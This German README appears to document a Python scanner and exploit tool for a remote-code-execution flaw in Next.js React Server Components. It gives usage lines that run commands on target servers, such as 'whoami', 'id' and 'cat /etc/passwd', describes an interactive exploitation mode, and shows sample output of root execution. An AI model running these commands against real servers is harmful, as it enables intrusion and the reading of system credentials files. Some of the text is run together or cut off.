
Ein Python-basierter Sicherheitsscanner zum Erkennen und Ausnutzen von **React Server Components (RSC)**-Schwachstellen in **Next.js**-Anwendungen. Dieses Tool führt passive Erkennung, aktives Fingerprinting und RCE-Ausnutzungstests durch.
Ein Python-basierter Sicherheitsscanner zum Erkennen und Ausnutzen von React Server Components (RSC)-Schwachstellen in Next.js-Anwendungen. Dieses Tool führt passive Erkennung, aktives Fingerprinting und RCE-Ausnutzungstests durch.
⚠️ WARNUNG: Dieses Tool ist nur für autorisierte Sicherheitstests bestimmt. Unautorisierter Zugriff auf Computersysteme ist illegal. Holen Sie immer eine schriftliche Genehmigung ein, bevor Sie testen.
✅ Passive Erkennung – Analysiert HTML, Header und Seitenstruktur auf RSC-Indikatoren
✅ Aktives Fingerprinting – Sendet RSC-spezifische Header, um Serverantworten zu erkennen
✅ HTTP-Header-Analyse – Identifiziert Next.js- und RSC-bezogene Header
✅ RCE-Ausnutzung – Führt Befehle auf anfälligen Servern aus (falls ausnutzbar)
✅ Farbige Terminalausgabe – Verbesserte visuelle Rückmeldung für bessere Lesbarkeit
✅ Interaktiver Modus – Mehrere Befehle im Ausnutzungsmodus ausführen
✅ Robuste Dekodierung – Verarbeitet gzip-komprimierte und binäre Payloads
Repository klonen
git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
cd CVE-2025-55182
Abhängigkeiten installieren
pip install -r requirements.txt
Erforderliche Pakete:
requests>=2.28.0 – HTTP-Client-Bibliothekurllib3>=1.26.0 – Erweiterte HTTP-Dienstprogrammecolorama>=0.4.6 – Terminalfarben (Windows-kompatibel)beautifulsoup4 – HTML-Parsingpython rsc_detector.py https://example.com
python rsc_detector.py https://example.com --exploit
python rsc_detector.py https://example.com --exploit --cmd "whoami"
python rsc_detector.py https://example.com --exploit
Dann Befehle an der Eingabeaufforderung eingeben (mit quit beenden).
| Option | Beschreibung |
|---|---|
<URL> | Ziel-URL (erforderlich). Fehlt das Protokoll, wird automatisch https:// vorangestellt |
--exploit | RCE-Ausnutzung nach der Erkennung aktivieren |
--cmd <Befehl> | Einen spezifischen Befehl ausführen (zusammen mit --exploit) |
RSC-Schwachstelle erkennen:
python rsc_detector.py https://target.com
Ausnutzen und id-Befehl ausführen:
python rsc_detector.py https://target.com --exploit --cmd "id"
Ausnutzen und cat /etc/passwd ausführen:
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
Interaktiver Modus (mehrere Befehle):
python rsc_detector.py https://target.com --exploit
window.__next_f-Marker (Next.js App Router)text/x-component Content-Type__NEXT_DATA__ und Next.js-ImporteServer-, Vary- und X-Nextjs-Cache-HeaderRSC: 1-Header[*] Starting RSC Detection Scan on: https://example.com
====================================================================
[1] Running Passive Scan...
Status: DETECTED
Score: 80/100
- Found: window.__next_f (App Router)
[2] Analyzing Headers...
- Vary header includes RSC: ...
[3] Running Active Fingerprint...
Status: DETECTED
- Response Content-Type became text/x-component
- Vary header contains 'RSC'
====================================================================
[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
Consider: RCE exploitation may be possible
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root
CVE-2025-55182 nutzt Folgendes aus:
child_process.execSync()Dieses Tool ist AUSSCHLIESSLICH FÜR AUTORISIERTE SICHERHEITSTESTS:
Unbefugter Computerzugriff ist illegal gemäß:
Wenn Sie mit diesem Tool eine Schwachstelle entdecken:
Das Tool ignoriert standardmäßig die SSL-Überprüfung. So aktivieren Sie sie:
detector = RSCDetector(url, verify_ssl=True)
Das Tool:
Timeout im Code erhöhen:
response = self.session.get(self.url, timeout=30) # 30 Sekunden
CVE-2025-55182/
├── README.md # Diese Datei
├── requirements.txt # Python-Abhängigkeiten
├── rsc_detector.py # Hauptscanner- und Exploit-Engine
├── rsc_cli.py # CLI-Dienstprogramme (falls vorhanden)
├── script.py # Zusätzliche Skripte (falls vorhanden)
├── COLOR_GUIDE.md # Farbausgabe-Dokumentation
└── .gitignore # Git-Ignore-Regeln
requests>=2.28.0 # HTTP requests
urllib3>=1.26.0 # Advanced HTTP
beautifulsoup4>=4.11.0 # HTML parsing
colorama>=0.4.6 # Terminal colors (Windows)
Alle auf einmal installieren:
pip install -r requirements.txt